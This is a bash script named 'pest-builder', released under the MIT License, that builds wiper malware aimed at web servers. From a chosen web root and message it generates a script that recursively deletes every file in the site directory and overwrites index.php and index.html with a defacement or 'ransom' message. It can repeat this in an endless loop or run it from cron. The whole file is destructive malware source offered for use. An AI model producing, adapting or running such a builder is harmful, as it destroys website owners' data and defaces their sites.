#!/usr/bin/env bash

# MIT License
# 
# Copyright (c) 2023 Robert Paul
# 
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# 
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# 
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.



template='#!/usr/bin/env bash

declare -r WEBROOT=

declare -r RANSOM_MESSAGE=

declare -r SLEEP_TIME=


function cld() {

    echo "Clearing $1"


    [ ! -e "$1" ] && return

    [ ! -d "$1" ] && return

    [ -e "$1" ] && [ -d "$1" ] && cd "$1"

    [ "$PWD" != "$1" ] && return

    [ "$(ls $1)" ] && rm * -r

    [ "$(ls $1)" ] && echo "00000000000000000" && return

    [ ! -s "$1" ] && echo "==================="

}

function act() {

    cld $WEBROOT
    echo $RANSOM_MESSAGE >"$WEBROOT/index.php"
    echo $RANSOM_MESSAGE >"$WEBROOT/index.html"
}
'


loop_template='
while [ 1 -eq 1 ]; do

    act

    sleep SLEEP_TIME
done
'


usage_text="Usage:\n\tbash pest-builder wiper|cronwiper path/to/webroot \"Ransom message\" sleepseconds\n\n";
usage_text+="Example:\n\tbash pest-builder wiper /home/user/public_html \"You have been hacked\" 300\n\n";
usage_text+="\tbash pest-builder cronwiper /home/user/public_html \"You have been hacked\"\n\n";

if [[ "$1" = "wiper" || "$1" = "cronwiper" ]]; then

    if [[ "$#" != 4 ]]; then
        echo -e $usage_text
        exit
    fi

    content=$template

    content=${content//-r WEBROOT=/-r WEBROOT=\"$2\"}
    content=${content//-r RANSOM_MESSAGE=/-r RANSOM_MESSAGE=\"$3\"}
    content=${content//-r SLEEP_TIME=/-r SLEEP_TIME=$4}

    if [[ "$1" = "wiper" ]]; then

        echo "$content" > ".wiper"
        echo -e "\n\n$loop_template" >> ".wiper"

        echo -e "\n\nWiper created successfully."
        exit

    elif [[ "$1" = "cronwiper" ]]; then
        echo "$content" > ".cron_wiper"
        echo -e "\n\nact" >> ".cron_wiper"

        echo -e "\n\nCron Wiper created successfully."
        exit
    fi

else

    echo -e $usage_text

    exit

fi


